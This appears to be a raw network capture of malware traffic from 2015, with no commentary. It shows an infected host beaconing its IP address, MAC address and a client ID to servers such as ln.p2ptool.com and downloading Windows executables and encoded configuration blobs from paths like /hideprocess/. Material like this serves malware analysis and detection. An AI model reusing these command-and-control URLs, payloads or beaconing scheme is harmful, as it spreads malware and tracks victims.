t.Nx...L$.d....aY_^.....Uj.h....'QV........{..v.P........$..p.........
. ..9.........<.....>.2.N|.......D$................^............
.Gj.h:...S........t$(3....\$....1A..|$$P.....1A..\$..\$,S{[email protected]..
.PS.....1A.P...T..AW.....0...O....0_^[...0...F.P...9A.......D$..t.V...
....^g.... QV.. .........,..T$..F.....^]..p... ..V..t.....3..L$...t..I
...3..T$,..... $P......(...(.......,.P.R.P.R.P...RPQ..Q.t.....F.^.(.3.
[email protected] ......9k ......W.|$T;.u=.C.P...8A...8..S..L$&
<<< skipped >>>

GET /hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat HTTP/1.1


Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:29 GMT
Content-Type: application/octet-stream
Content-Length: 131253
Connection: keep-alive
X-Request-Id: 5c0b395c52cb0988f35dd63948d4c9fc; bc97604dddda8a3ef0be77b0b847f417; 75fc99a2b730438414b753605f89a35d
X-Source: U/200
Last-Modified: Mon, 23 Mar 2015 03:11:59 GMT
Expires: Tue, 09 Jun 2015 11:56:15 GMT
Cache-Control: max-age=651107
Accept-Ranges: bytes
Age: 88755
X-Cache: HIT from ctn-zj-hgh-099; MISS(S)|HIT from cun-sd-tao-069; MISS|HIT from usn-us-sms-098
[email protected]...........!..L.!This program cannot b
e run in DOS mode....$Z....J,..$...........$.?A....$........1........#
.$......8..%[email protected]....|.U......
!.........P.....p=....... .......`[email protected].......
.....b...T...d..BP...K.....`...#...!..8.....:`....O ...P.......text...
............... ..`.rdata................R@..@.'.....|.......\....(...
.rsrc.... P.%.E....L.....P.areloc...P.`...1...(..B0.....*.......h.....
.;....*..Y....uh........ hp..$.)&. h`.........9.......h........K.....&
U.............3..E.h.................j.P.S....E.P.u.....P..x!.........
. ...M.3........]........w..$......................Vh......j.V..~....o
V4.....0..........t....t3.B......u.jxh.w..h.w...7...j7....&......3.^..
..F..B..F.....^[.....U..V..W...>y.Gt.jZJ. ..J...3._^]...u.j[....y..
...0Sh.A...^.j.S..~..h.....C....V4.j P.s...~...M.... .........E.....0.
....$....F.j&.. [email protected]....$..uM9%.Bt.ja..b.x...?.....8....r.jb...`..
."..........3.[h....0..[..........W.}.jpj.......V.X}[email protected]
t.hX...h.|w.'....0.>...._.F`..FH......"....D...............SV...D$.
].....W.\$........t.h...b.|[email protected].........;.t....;.t.h.4.c8}
....4....K....w7...v....u-.......Y......s...... ...3......4.`...h.~...
!-....Qh.~........R..P.......].P.......!..a...... ...3........4...;...
h.~.....Q@...@.`......F.......x........................@..............
..............tW...t.hN....!....q.............0S..g.R...h...... ..3...
.. .g6...*..<. h$3..,.."3.....(..^.!....1Ph,>...>. .._...
<<< skipped >>>


GET /txt/qpqpqp_201505291802.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=1FC77115C819B7258FC1528899CADE7A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:28 GMT
Content-Type: text/plain
Content-Length: 131376
Last-Modified: Fri, 29 May 2015 10:02:33 GMT
Connection: close
ETag: "55683939-20130"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJSg1HDvu0fCwtUwmory885X0B08Nr3lSxBaIDqW2
l3RvsY GH2UJAHUCXzx4 mkGqSCDSlCWbCA  IgmipfV8VJlwpOcrOixJhd4iH5KuvIsTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dBT5GlbXQrd n3YNPrA6SxfVvh3CJHt4
bI9xlBmLsuLjPgwpxgTHibCn0Fz4eYFSdrlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtCfJw
2WASts57NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrL8AYVCLiuZ
CCMVbBdE 4V8TazQ2ZSPlrxNrNDZlI Wvi03Nmtgxjj8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrbgZhvAzHEaPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziEHRmRKbAnM6osYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ72jWZM7wxJ5/Dkgp0v8b7UsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAvJ46JuW9FgLJ
Z8KCVZBu3E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0/hTLesNO
U3zfwD/apg uknevZ9E Uwawl3GIUk3N3uiy6tRS5Dm3Sir1KGo8YLxbG2cKNuElZSmmL5
PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E
7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>


GET /wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ HTTP/1.1
Host: app.log.soomeng.com
Connection: keep-alive
Accept: */*


HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Wed, 03 Jun 2015 02:47:27 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: keep-alive
GIF89a.............!.......,...........L..;..



GET /main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:20 GMT
Content-Type: application/octet-stream
Content-Length: 648089
Connection: keep-alive
X-Request-Id: f410d7e60b27d4cece23e29d91736289; 9bc8c2544f2a3e1cbeb5bc3e10f08654
X-Source: U/200
Last-Modified: Thu, 02 Apr 2015 12:12:21 GMT
Expires: Wed, 10 Jun 2015 06:11:15 GMT
Cache-Control: max-age=657318
Accept-Ranges: bytes
Age: 247900
X-Cache: MISS|MISS from cache_img_86; MISS(S)|HIT from cun-sd-tao-073, MISS|MISS from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot 
be run in DOS mode....$Z...N.../....Q.}n....1P.x...Q../...W"..(.......
..XT.. [email protected]....!.U.................@..
..hI..............a...... ....2.p E....!@.)..,..=..........Pd....C.@..
...................8.....:.....O....P.......text...w............... ..
`.rdata.....T.w.......&...."@.'[email protected]...."
..t.%R.$.....P.areloc.............V(..B0.....2.U..j.h:bI.d.P..P...\.3.
P.E.d...1.E......|._.P"J..E.....h..J..........M.d..(.eY..].....`..t`..
..`........lq.o..J..{q...p...p...xp......p..`p...p...h.._...h.J.h...V.
...Y..&h. ..p ... ... ..` ... ... ..P ..{ ..../............&.$....`./.
....5h......0.*....%.. ... ... ...j.....J...._....h$P.j..J...0.&hD ...
 ..{ ..\ ..  ..[ . h,[email protected].. hJ...!..p..k_..
j"..T.......hh._........$^.. .... hm.........B.....@.<._.........._
[email protected][email protected]........$....
..\$H.D$H...z..z.....QU..V.u...tP...r...;.u..........s....t5..:.u'...t
*.A.:B.u....t..A.:B.u....t..A.:B.t......^].3.^]...%.G..-QVB.S...u.6...
./....E..t.V._.l...?.r^..]........Gj.h.`.._.%.M].G....L.....E.......%B
H..3...R.V.E.VW......}.j..u...V......0.F.....F...E...F.......`.3..F...
..f.F..E...F.f.F .E...F$.F(.E...F,.F0.E....u0.E..E...J.P.M.....K.p..E.
.#J......E.h..[.P.ID..WV.4R.....S..?.._^.M.3......J.....P...........{.
!..m.......F,..t.P.....0.F,.....2.F$...k........2.F....P....6.B..F....
5...>..Z.2.F........j.bE...F...#..........X..5U....S.....*U....
<<< skipped >>>


GET /txt/whitelist.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:33 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Y
e5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLE
Onja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9h
subAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6d
hDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMR
hz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HV
CyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 U
IxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9
AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6p
sVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgI
LxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9
Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygN
WYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55z
wjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xa
vSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4neby
iCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Ob
a8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT0
1I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1i
mxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq je
NXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTR
bs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapa
jXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW
<<< skipped >>>


GET /txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/html
Content-Length: 747
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>404 Not Found</title></head>..&
lt;body bgcolor="white">..<h1>404 Not Found</h1>..<p
>The requested URL was not found on this server. Sorry for the inco
nvenience.<br/>..Please report this message and include the foll
owing information to us.<br/>..Thank you very much!</p>..&
lt;table>..<tr>..<td>URL:</td>..<td>hXXp://
ln.p2ptool.com/txt/popup_20150414.txt?ver=3.180&uid=zynet.4&li
p=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=
545EB4FE6391624B14A14B0DA1B44223</td>..</tr>..<tr>..
<td>Server:</td>..<td>localhost.localdomain</td&g
t;..</tr>..<tr>..<td>Date:</td>..<td>201
5/06/03 10:46:18</td>..</tr>..</table>..<hr/>P
owered by Tengine/2.0.2</body>..</html>....



GET /txt/First_20150519.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 185696
Last-Modified: Tue, 19 May 2015 04:05:51 GMT
Connection: close
ETag: "555ab69f-2d560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJrPpIprWhJ2tPlAWn5 TjuztACdIRySqDk4MSimn
Tp7Za1Le92vuezrOyB4j/JVkCCgW5ce60uh313VwRVQB2SErOAjo8XcQ2WTk w36cDu4SJ
AaYIwk4/xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH32nMDkPr o8n05oDilNe
9ohcLeJfUZLUAxjJhcXsCVRzZRGqugj1TL1tXZUFbwHFHnTppb1vpUZub8fxolpGyp5vx/
GiWkbKmJMRiA8G3nBa2Pi04AYpQX6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI W
vHDXnxMFqqR8/kuGsSG23HxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrgxx16VQkub/E2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9VHGe2k 9RJcWz6ytVaQ5/E2s0NmUj5azE4dSQE
6hF3aV6mEpZjZPX2q/qmcTWzkmR2fA/LXFaCxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWi8
kaOaFmzJl6VALS5kB2H8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBrfwq59iIOLC0tZfeza
JwrE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8Ta
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>


GET /txt/urlnav_141114.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wr
MOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3
TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3
dB7txKLcg4QGva912G4GnwNO6uG0yW9iLynDUHq/HLA1I0Mgx7sTvMrqVegigsaPAMlycn
0DaQTrXm/H8aJaRsqeb8fxolpGypFklHa0IUJrWtj4tOAGKUF sMaJudVXlW6wxom51VeV
ZRJhvIVRruRFx5KEBxs2/8UZSS65y3h1b0AuZLZP47s8TazQ2ZSPlrxNrNDZlI Wukxah1
b3uqqMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk l
eK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7AA7l/dPFp2Oo4QVxT3CU2MTazQ2ZSPlrEk
Yhq4qBTrw/Rp3LuKWWWBNKEt5jwcC0SLZsRYA4Cs/E2s0NmUj5a3C2I9Jaq5QixNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oURZpHHpqzKdokEsJbVR23tr2s6uv3 o5ZREMMJf0vpcLusis07 NvMwA6jAbzQgABzI
bqI92FStaOaeCfpWjRWrVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r
648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ41Wy3 HVsBv5Bepmeh2dZe/TnDXSN51O5
<<< skipped >>>


GET /plus/config/zynet.4.bin?ver=3.180&lip=192.168.25.207&mac=000C298E22D8 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.3
Date: Wed, 03 Jun 2015 02:46:14 GMT
Content-Type: application/octet-stream
Content-Length: 1351
Connection: close
Expires: Wed, 03 Jun 2015 02:46:14 GMT
Cache-Control: max-age=0
....<........09......7.!......,........................ ...........
...................................Q...*#..-*g...C..[I9l)e...LW.JPT\.R
.).CICmff:aXR.E\.....Dwr&9;.8j=>w*#M...EMVS.Btb`R7o...`...T^..c.bK.
.K...B#..................-............................................
............................^........Y#.........3.c.....KSSF.&y..'.S&l
t;.XJ\,....................................................h..........
8G..@............'Xzh2z(g/77*,<v?`Rm4..............................
..............................j.......F....b9\j..Z.4..................
........5.............................................................
h....>..d#....L ...............................4...................
.........................................l...\T..|.#.....Jv....M.....8
h.V.TDg,ltiG..Z.V.Mc0hG3..............................................
.............i...0.....q....%..R....z..........................2......
....................................................r.....!.C..J?.....
n.M.i............................ ....................................
...............[A.x75d.vj}de?JX...`...F.S......h.4..B...............-.
....................................................]...`U..)..oe..=..
p...u................,................................................
.........].......%.. Fm..o...........~-:hyF\P.6~49`1^.34q(............
......................................
<<< skipped >>>


GET /txt/ndis500_201506021708.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=7CB8231FE216E8F14A76B6A891124D85 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:23 GMT
Content-Type: text/plain
Content-Length: 349276
Last-Modified: Tue, 02 Jun 2015 09:08:27 GMT
Connection: close
ETag: "556d728b-5545c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJSg1HDvu0fCwtUwmory885X0B08Nr3lSxBaIDqW2
l3RvsY GH2UJAHUCXzx4 mkGqSCDSlCWbCA  IgmipfV8VJlwpOcrOixJhd4iH5KuvIsTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dBT5GlbXQrd n3YNPrA6SxfVvh3CJHt4
bI9xlBmLsuLjPgwpxgTHibCn0Fz4eYFSdrlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtCfJw
2WASts57NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrL8AYVCLiuZ
CCMVbBdE 4V8TazQ2ZSPlrxNrNDZlI Wvi03Nmtgxjj8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrbgZhvAzHEaPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziEHRmRKbAnM6osYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ72jWZM7wxJ5/Dkgp0v8b7UsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAvJ46JuW9FgLJ
Z8KCVZBu3E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0/hTLesNO
U3zfwD/apg uknevZ9E Uwawl3GIUk3N3uiy6tRS5Dm3Sir1KGo8YLxbG2cKNuElZSmmL5
PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E
7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>


GET /txt/listbc_20150602170806.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=E80C963847ACDC40BDEC9EB688A407E8 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 732892
Last-Modified: Tue, 02 Jun 2015 09:08:07 GMT
Connection: close
ETag: "556d7277-b2edc"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCs7GeQSgT0LMSbeMnDrAUu1dbIAT
I0j4Fpg2lzu0SyFXzewwBYw9RMWaq6NhW/qg8rEKg/FLPEQc4O/r6B tUg au31FBt5lt6
BIPeEcR3JJeXgyq3ERRVAtyQEhfZ0huL70G maW8Endo8iciIVsnYeiZuZCZoCFCUfpqGd
FWishA/RXin0XXN4oaBk5hQl ENYGDXKTReMLdfZyT5q IBVZIi51RfhrztHLTG0EEf1Of
LN52HToyuXz6IPoP8wDQi7tJMl31DlbpHsiv1c7IhlgqSaCVUmNsyYiDQUgxqGmbx2Vndz
WKuzgUzL0/tfbRE6l9I9 Zda06Hfr0VZGjSEOrYe65uttTZs NQKnlXBIaWKZ5oLaPOZkn
4b4bFzT9BZqEHXkdbKraEkVIa2RpWitpTjGkjvfPlaHPLxHwYyO9yn57CcpN35xfW7smFk
DGzBhRwfNLV8nUSDSO9nKOX7fTg4L5oFJGauP1vWaua4PwssRErj2jHG//V1rBG1CyX3fd
IWIte7xQs3MggpiSeXuME2PyHnSRkK/M2mNXZaUcnpBOqZ5Bj8Y5pxJ rhCwgXs8X2VvqX
9iu4C86SsB40oelBk5U6QSww6qR 8pHDhhHnZ4IsuyAOhAdmv6Tj4NmdB4nbOhonncjeFe
